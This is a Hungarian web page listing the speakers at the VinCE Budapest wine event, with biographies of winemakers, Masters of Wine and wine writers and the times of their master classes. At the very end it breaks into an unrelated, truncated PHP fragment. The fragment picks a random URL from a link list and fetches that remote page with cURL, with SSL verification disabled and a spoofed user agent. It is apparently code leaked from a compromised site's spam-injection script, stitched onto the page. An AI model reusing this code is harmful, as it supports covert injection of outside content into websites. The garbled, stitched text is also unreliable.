Előadók


A VinCE Budapest rendezvényre minden jegy elkelt. Sem a helyszínen, sem online nem lehet jegyet vásárolni.

Március 6., 13.30, Mesterkurzusterem – Chablis mesterkurzus a Domaine Laroche boraival
Gwenael Laroche, Franciaország
Gwénaël-LarocheGwenael a Domaine Laroche tulajdonosa és a márka „nagykövete”. A birtok története 1850-ben, Chablis régió fejlődésével párhuzamosan kezdődött. (Chablis Burgundia része, így a burgundi AOC, azaz a terület alapú eredetvédelmi rendszer érvényes itt is). A Laroche ma már a borvidék vezető és úttörő birtoka, például csavaros fémkupakokat ők használtak először Franciaországban, ami óriási tettnek számított a tradicionális szemléletű, komoly bortörténelemmel bíró országban. A Laroche borok a modernitást és a tradíciókat ötvözik, fő vezérelvük az egyszerűség és az elegancia. A mészköves talaj utánozhatatlan ásványosságot kölcsönöz a chardonnaynak, szinte terroirt kortyolunk, ha Laroche bort iszunk! „A legjobban azt szeretem a munkámban, hogy világszerte közvetíthetem a Laroche Birtok és boraink értékeit – a szenvedélyemet. És több mint 25 éve ugyanolyan lelkesedéssel végzem a feladatom” – állítja Gwenael a Laroche gyönyörű bemutatkozó kisfilmjében, ami a honlapjukon megtekinthető. www.larochewines.com

Március 6, 15.30, Mesterkurzusterem – Fedezze fel Kalifornia borait!
Clauda-Schug-Schuetz-1Claudia Schug, Egyesült Államok

Claudia számára a bor egyrészt nemzetközi, másrészt családi ügy. Klaudia szülei egy német borászatban éltek, majd 1961-ben emigráltak Kaliforniába. A két nyelvet anyanyelvi szinten beszélő Claudia egyaránt részesült az óvilág és az újvilág áldásaiból. Kaliforniában született, a Napa-völgyben nevelkedett. A Stanford Egyetemen szerzett közgazdasági diplomát, majd marketing, PR és export területeken dolgozott. Húsz évvel ezelőtt megalapította kaliforniai borokat importáló és forgalmazó cégét Németországban. 2012-től fő profilja a kaliforniai borok promóciója lett, és mint a California Wine Institute „oktató nagykövete”, a német szakmát és borkedvelő közönséget oktatja és ismerteti meg a kaliforniai borokkal. Egyúttal ő családi pincészetük, a Schug Carneros Estate európai képviselője. Rendszeresen bírál a Mundus Vini és az IWSC borversenyeken, tagja a Német Sommelier Szövetségnek és a borakadémikusok klubjának (WSET Honors Diploma az Osztrák Borakadémiától). Jelenleg a Master of Wine képzést végzi.

6 March, 15.30, Carton Hungaricum terem– Premium Estates of Austria
Andreas WickoffAndreas Wickhoff, Ausztria
Az Ausztria vezető birtokait tömörítő szervezet (Premium Estates of Austria) ügyvezető igazgatójaként Andreas Wickhoff folyamatosan járja a világot, hogy népszerűsítse a szervezet tagjainak borait és röviditalait, miközben részben az előállítási folyamatban is részt vesz. Mielőtt 2004-ben megalapították az egyesületet, Korzikán, illetve Kolorádóban (USA) sommelier-ként és borbeszerzőként dolgozott. 15 éves tapasztalattal rendelkezik a ritkaságok és az ikonborok területén, igazi „fine and rare wine” szakértő. 2012-ben szerezte meg Master of Wine titulusát – ekkor ő volt a valaha legfiatalabban MW címet szerzett szakember. www.andreaswickhoff.com

Március 6, 17.30, Carton Hungaricum terem – „Oscar-díjas pezsgők”
Márkus-GyörgyMárkus György, Magyarország
Könnyen lehet, hogy Márkus Györgyöt Champagne-ban többen ismerik, mint Magyarországon, mivel bejáratos minden Champagne-házba. A Central European Wine Institute oktatója, ő szerkeszti a negyedévente megjelenő Burgundia és Champagne című kiadványt. A VinCE Budapest visszatérő előadója 2015-ben „Oscar-díjas pezsgőkről”, azaz a CSWWC (Champagne & Sparkling Wine World Championships) által díjazott pezsgőkről, cavákról és champagne-okról fog beszélni, illetve kóstolót adni. (A Tom Stevenson, neves brit pezsgő- és champagne-szakértő által alapított díjról itt olvashat bővebben: www.vincemagazin.hu/2014/09/egy-rose-lett-a-vilag-legjobb-champagne-a.)

Március 7., 9.30, Mesterkurzusterem – A chardonnay művészete, a Ruinart pezsgőház kóstolója
Frédéric Panaïotis, Franciaország
Frédéric PanaiotisFréderic Panaïotis Reims-ből, borral és szőlővel foglalkozó családból származik, Montpellier-ben szerzett önológiai diplomát, majd a Rhône vidékén és Kaliforniában is dolgozott, mielőtt a Veuve Clicquot-hoz került volna, hogy a Jacques Péters pincemester mellett eltöltött 12 év alatt elmerüljön a champagne titkaiban. Egy interjúban elmondta, hogy diákkorában egy 1969-es Pouilly-Fuissét kóstolva dőlt el benne, hogy borász lesz, és a rá legnagyobb hatással lévő borok között felsorolta Szepsy István 1999-es 6 puttonyos Aszúját is. 2007-ben érkezett a Ruinart-hoz, ahol megérintette a ház hihetetlenül gazdag történelme és hagyományai, ugyanakkor a pezsgők stílusát is a sajátjának érzi, most már ő felel a blendelésért a Blanc de Blancs-októl a Ruinart presztízs cuvée-kig, mint a Dom Ruinart és a Dom Ruinart Rosé. A pincében végzett munka mellett a Ruinart-ház utazó nagykövete is. www.ruinart.com

Március 7., 11.30, Mesterkurzusterem – Újvilág –  Új-Zéland / A Gyűrűk Urának földje borban is mesés
anne_krebiehl_headshotAnne Krebiehl MW, Németország / Egyesült Királyság
A német születésű, de Londonban tevékenykedő Anne Krebiehl szabadúszó borszakíró és oktató 2014-ben szerezte meg Master of Wine diplomáját. A borkereskedelemmel és -fogyasztással kapcsolatos cikkei a The World of Fine Wine, Harpers, Wine & Spirit, a The Drinks Business, az Imbibe, a Falstaff Deutschland és a Sommelier India magazinokban jelennek meg, ezenkívül a US Wine Enthusiast magazin Ausztriával foglalkozó főmunkatársa. Német borászatról tart órákat, londoni éttermek tanácsadója, és folyamatosan fordít szövegeket is, valamint nemzetközi borversenyeken (IWC, IWSC, DWWA) gyakorta vállal bírálói feladatokat. Elsősorban a német, osztrák, olasz és új-zélandi borászat foglalkoztatja (különös tekintettel a pinot noirra és a rizlingre), többször részt vett már szüreteken és a borkészítés folyamatában is.

Március 7., 11.30, Carton Hungaricum terem Château Pontet-Canet vertikális kóstoló 10 évjárat boraival
Melanie Tesseron, Franciaország
Melanie TesseronMelanie Tesseron a bordeaux-i biodinamikus Château Pontet-Canet tulajdonos-trónörököse, mely egyike a Bordeaux-ban mintegy 3000 birtokból álló piramis csúcsán elhelyezkedő grand cru birtokoknak, úgynevezett cinquièmes cru Pauillac-ban, a Mouton–Rothschild, a Château Lafite–Rothschild és a Château Latour szomszédságában. A 10 évet felölelő vertikális kóstolón 2001-től 2011-ig kóstolhatjuk végig a birtok borait Melanie Tesseron vezetésével, akit a The drinks business magazin 2012-ben a borszakma 23. legnagyobb hatású asszonyának választott. „A biodinamikus gazdálkodás sokkal inkább életvitel, mint marketingfogás. Ez a felfogás újra szoros kapcsolatot teremtett köztünk és a szőlő között” – nyilatkozta Melanie a VinCE Magazinnak. A Château Pontet-Canet-ről szóló korábbi cikkünk itt olvasható: borvilag.files.wordpress.com/2012/08/vince-april-2012-pontet-canet.pdf
www.pontet-canet.com

csizmadia-honigh-peterMárcius 7., 11.30, Workshopterem – Château Pontet-Canet vertikális kóstoló 10 évjárat boraival
Csizmadia-Honigh Péter, Egyesült Királyság
Csizmadia-Honigh Péter londoni székhelyű borszakíró és tanácsadó. Miután Budapesten diplomát szerzett angol irodalomból, közgazdaságtanból és pedagógiából, 2005-ben a brit borpiac felé vette az irányt, és egészen 2014-ig a Master of Wine intézet oktatási menedzsereként dolgozott. WSET diplomáját Londonban szerezte, a spanyolországi Jerez községben pedig okleveles sherry oktató lett. A munkájának köszönhetően rengeteg borvidéket felkeresett szerte a világban: készített shirazt Chilében, elvégzett egy felsőfokú Napa-völgy programot Kaliforniában, és körbeautózta és „kóstolta” a dél-afrikai Fokváros környéki birtokokat. 2007-ben megalapította a Royal Somló Birtokot, melynek juhfark borai Michelin-csillagos éttermekben kóstolhatók. Péter rendszeresen publikál Bordeaux, Chianti és Németország borairól magyar, indiai, brit és amerikai magazinokban – többek között a VinCE Magazinnak is. 2014-ben megkapta a Geoffrey Roberts díjat. Péter India borairól írt könyve (The Wines of India, a Concise Guide) előreláthatólag 2015 őszén fog megjelenni. Csizmadia-Honigh Péter blogja: borvilag.com

Március 7., 13.30, Mesterkurzusterem – Két külföldi biodinamikus itthon
Előadók: Angela lés Werner Michlits, Meinklang
Gazdaságuk olyan, amellyel korábban vidékükön lépten-nyomon találkozhattunk: egy pannóniai vegyes gabiodinamikus 2zdaság, melyet egy nagycsalád üzemeltet. Anneliese és idősebb Werner, Johannesszel és Lukasszal egy színes, Demeter certifikált mezőgazdasággal foglalkoznak, éspedig termények sokaságával, mint: Topáz-alma, napraforgó, kukorica és gabonák; ezeken belül pedig ősi, rég elfeledett fajtákkal is, mint kétszemű búza vagy tönke és az alakor. Csapatuk tagjaiként már több mint 300 Angus szarvasmarha is népesíti a Meinklang-gazdaságot. Ezek az engedelmes és a pannon flórához tökéletesen alkalmazkodott állatok nem csak a tájkép gazdagítói a „Seewinkel” Nemzeti Parkban, hanem lehetővé is teszik a zárt természetes tápanyag-körforgalmat. Ebbe az élő szervezetként működő udvartartásba ágyazódik be a borpincészet, melyet Angela és ifj. Werner vezet.
2013-ben a Meinklang birtok a TERRA HUNGARICA (igaz borok Európa szívéböl) tagja lett.

Március 7., 13.30, Mesterkurzusterem – Két külföldi biodinamikus itthon
Előadók: Ralf Wassmann, WassmannMeinklang
Ralf a német Harz hegység nyugati részén nőtt fel, és fiatalként szőlő híján meggyből, csipkebogyóból és egresből készített bort. Ebből egyértelműen következett, hogy az érettségi után a Rajna-menti Geisenheim egyetemén bortermelést és italtechnológiát tanult. De hogyan került ő és felesége, Susann Magyarországra? A Villány-Siklósi borvidék 1998-ban vonzotta őket ide. Siklóson, egy déli fekvésű domboldalban vásároltak egy csodálatos, mandula- és barackfákkal tarkított 1.000 m2-es parcellát, ahol Chardonnay és Olaszrizling terem, valamint még 1.000 m2-nyi Oportót. Ma már két hektáron termelnek szőlőt.
2003-ban a Biokontroll Hungária Nonprofit Kft.-nél bejelentkeztek az biológiai gazdálkodás ellenőrzésésre. 2009 óta tanácsadóként segítik kollégáikat is, akik át akarnak térni a “bio”-ra. 2011-ben kapcsolatba léptek a DEMETER INTERNATIONAL-lal és hivatalosan is átálltak biodinamikus gazdálkodásra. 2013-ben a Wassmann Pince TERRA HUNGARICA (igaz borok Európa szívéböl) tagja lett.

Március 7., 15.30, Carton Hungaricum terem  Egy új generációs elzászi borászat: Domaine Loew
Etienne LoewEtienne Loew, Franciaország
Egyetemi tanulmányai és Oregonban szerzett munkatapasztalata után, 1996-ban Etienne Loew visszatért a családi vállalkozáshoz Észak-Elzászba, ahol nem egész egy hektáron kezdett bele a biodinamikus borászatba. Loew a “módszerben” nem az extra terhet látja, hanem a fenntarthatóság és a szőlő ellenálló-képessége növelésének lehetőségét, na meg persze a természetes alapanyag biztosítását kiváló boraihoz. A muskotályost az egyik legjobb dolognak tartja Elzászban, és Sylvaner Verité boráról pedig úgy nyilatkozik, hogy erős, mint egy ökölvívó ökle.www.domaineloew.fr

Március 8., 9.30, Mesterkurzusterem  A világ legszebb reggelije / 10 méthode traditionalle pezsgő+kaviár+macaron
EssiAvellan_0021Essi Avellan MW, Finnország
Finnország első Master of Wine-ja, nemzetközi borszakíró és champagne-szakértő, aki a világ egyetlen champagne magazinját, a FINE Champagne-t szerkeszti. Számos kötet szerzője (Matka Champagneen, Parhaat samppanjat; The Finest Wines Ever Made), valamint Tom Stevenson díjnyertes „pezsgő bibliájának” (Christie’s World Encyclopedia of Champagne and Spakling Wine) szakmai lektora. Elismert borbíráló, a FINE Magazinok és a The World of Fine Wine állandó zsűrije, elnöke volt a Decanter World Wine Awards Champagne paneljének, illetve tagja a Tom Stevenson alapította Champagne and Sparkling Wine World Championships megmérettetésnek, amiről itt olvashat bővebben: http://www.vincemagazin.hu/2014/09/egy-rose-lett-a-vilag-legjobb-champagne-a/. Kitüntetései: Dame Chevalier of Ordre de Coteaux de Champagne, Commandeur of Comanderie de Bordeaux. www.essiavellan.co

Garamvári VencelMárcius 8., 9.30, Mesterkurzusterem – A világ legszebb reggelije / 10 méthode traditionalle pezsgő+kaviár+macaron
Garamvári Vencel, Magyarország
A pezsgővel 1966 óta, csaknem 50 éve foglalkozik. Első munkahelye a Kertészeti Egyetem elvégzése után a Törley pezsgő üzem volt. Itt 12 évet töltött, 1970 és 1978 között ő volt az üzem vezetője. 1990-ben alapították saját családi cégüket, melyben 1999-től kezdték el a Vincent pezsgő értékesítését. Idén 25 éves lesz cégük, és a pezsgőgyártással is a 15 éves jubileumot fogják hamarosan ünnepelni. garamvariszolobirtok.hu

Antonio AlvarezMárcius 8., 9.30, Mesterkurzusterem – A világ legszebb reggelije / 10 méthode traditionalle pezsgő+kaviár+macaron
Antonio Alverez, Spanyolország
Antonio Alverez az Egyesült Államokban alapított kézműves spanyol borokat és ételeket árusító webshopot (tienda.com). Spanyolországban a Bodegas Frutos Villar értékesítési vezetője volt 2 évig, majd 9 éven keresztül dolgozott a Rueda borvidéken, a Bodegas Bocennél mint külkereskedelmi menedzser. Legutóbbi 3 évét a Cava Agusti Torellónál töltötte, szintén külkereskedelmi vezetőként. www.tienda.com

Március 8., 9.30, Mesterkurzusterem – A világ legszebb reggelije / 10 méthode traditionalle pezsgő+kaviár+macaron
forgetChristian Forget
Champagne-i pincemester, aki pinot noir és chardonnay mellett furmintból is készít pezsgőt! Született „chef de cave”, családja több generáció óta szőlőtulajdonos Champagne-ban, másfél hektáros birtokukról az 1920-as évektől saját néven palackoznak is.
Ideje nagy részét a Champagne Paul Bara pincemestereként tölti – a friss, vibrálóan élénk stílusáról ismert domaine központja a pinot noirjáról híres grand cru település, Bouzy. Kizárólag saját területeikről szüretelnek, hogy pezsgőik minél jobban kifejezhessék a termőhely egyediségét és minőségét.
A pincemester a terroir titkát szerette volna megfejteni Somlón is, ahol 2009-ben járt először a Kreinbacher Birtok meghívására. Mindig szerette volna kipróbálni magát egy számára ismeretlen borvidéken, korábban ismeretlen szőlőfajtákkal dolgozva, így örömmel segíti a Birtok munkáját első saját, tradicionális pezsgőik elkészítésében.
Mára a hazai dűlőkön is otthon érzi magát, Champagne-ban több száz éves tradíciókat követ, Somlón pedig újak megteremtésénél közreműködik.

Március 8., 11.30, Mesterkurzusterem Új trend / Prémium rozék
new_wine_photo_louiseLouise Sydbeck MW, Franciaország
Louise több mint 15 éves borszakmai tapasztalattal rendelkezik. Egy svéd sommelier program után Franciaországban mélyült el jobban a szenvedélyében: Rhone-ban borászati egyetemet végzett, majd Provance-ban kóstolókat és utazásokat szervezett. Végül kikötött a Francia Riviérán, ahol céget alapított, luxus jachtok utasai számára tanácsot ad, illetve biztosítja borkészletüket. Borbírálóként, oktatóként és előadóként is tevékenykedik. 2014-ben harmadik svédként elnyerte a Master of Wine címet, és a kitűnő kóstolási eredményeiért a Bollinger-díjat is. Cége, a Riviera Wine Support weboldala: www.rivierawine.fr

Március 8., 13.30, Mesterkurzusterem  Syrah – Shiraz / A legbujább szőlőfajta
Christopher Burr MWChristopher Burr MW, Egyesült Királyság

A ‘Wotwine?’ alkalmazas es weboldal alapítója, amelynek fő célja, hogy a szupermarketekben vásárló borfogyasztókat segítse a választásban az angol piacon. Master of Wine titulusat 1995-ben szerezte. Hosszú és változatos szakmai karrierje során vezető pozíciókat töltött be a borok és a sörfőzdék világában: a Bass Brewers európai igazgatója, a Mentzendorff és a Domaines Drouhin borimport cégek ügyvezetője, illetve a Christie’s aukciósház borüzletágának nemzetközi igazgatója.
Mindezek mellett Christopher tanácsadókent dolgozik borgyűjtők mellett, és konzultánsként segíti számos francia, olasz, horvát és angol borászat munkáját.

Romsics_LaszloMárcius 8, 15.30, Mesterkurzusterem – Teenage (Wine) Dream
Romsics László, Magyarország
Nemzetközi borakadémikus és a londoni Master of Wine intézet hallgatója. Borszakíró, a VinCE Magazin állandó szakértője. Borász, az Etyek-budai és Villányi borvidéken területekkel rendelkező György-Villa főborásza, emelett előadóként is tevékenykedik a hazai boriskolákban. Szakmai tapasztalatai jó részét külföldön szerezte: Chile, Ausztrália, Új-Zéland, Spanyolország, Olaszország, Franciaország és Németország számos borvidékén járt. A VinCE Magazinnál – és korábban a Decanter magazin hazai kiadásánál – nemcsak szakmai lektor és állandó tanácsadó, hanem a magazin tematikájának kialakításában is komoly szerepe van, illetve a tesztek levezetését is ő végzi.

Március 8., 17.30, Mesterkurzusterem – Egzotikus borok és ételek – Az ismeretlen Azerbajdzsán
Darrel Joseph, Ausztria / Egyesült Államok
58765_Darrel_JosephA bécsi illetőségű Darrel Joseph Közép-, Kelet- és Délkelet-Európa borainak és borvidékeinek szakértőjeként a nagy-britanniai Decanter és Harpers Wine & Spirit, a német Meininger’s Wine Business International és az osztrák wein-pur kiadványokban publikál. Továbbá az amerikai Wine Spectator lapban jelennek meg cikkei, és közreműködik Hugh Johnson Pocket Wine Book-jában, valamint a wein-pur Best of Austria kiadványában. Darrel volt az angol nyelvű szerkesztője Alkonyi László Tokaj – A szabadság bora című könyvének.
Bíróként is részt vesz nemzetközi borversenyeken, úgymint a megújult londoni Decanter World Wine Awards, a Concours Mondial de Bruxelles, a Berlin Wine Trophy, a magyarországi Pannon Bormustra és a horvátországi Vinistra versenyeken. Európa szerte tart borkóstolásokat és bemutatókat különböző borklubok, borászati iskolák, üzleti és magánügyfelek számára. A VinCE Budapesten évről-évre előad (2012-ben a horvát, 2013-ban az osztrák, 2014-ben balkáni borokról adott ízelítőt), 2015-ben az ismeretlen Azerbajdzsánba kalauzolja a vendégeket.

Március 8., 17.30–19.00, Mesterkurzusterem – Gancia olasz pezsgőkóstoló
Massimiliano Gancia, Olaszország
maxerika 081Massimiliano Gancia 1960-ban született az olasz Canelli városban, ahol a Gancia család borászata is található. A Gancia pezsgőház alapítójának, Carlo Ganciának ük/szép -unokája, vagyis 5. generációs leszármazottja.
Közgazdasági tanulmányait Kaliforniában végezte, majd később BMA fokozatot is szerzett. A tanulmányai befejezése után, 1983-ban egyből a családi borászatnál állt munkába és azóta is töretlenül itt dolgozik. Külkereskedelmi igazgatóként ő felel a Gancia márka külföldi terjesztéséért. Munkája egyben a hobbija is, illetve előszeretettel foglalkozik bor-gasztronómiával is. Emellett szeret utazni és szereti a sportokat is.
Gancia mára Olaszország egyik legjelentősebb vállalatává nőtte ki magát, 16-féle pezsgőt készítenek, melyek többsége eredetvédett (DOC, DOCG), de ezen kívül borokkal és egyéb likőrökkel, különlegességekkel is kényeztetik az olaszos életérzés követőit.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>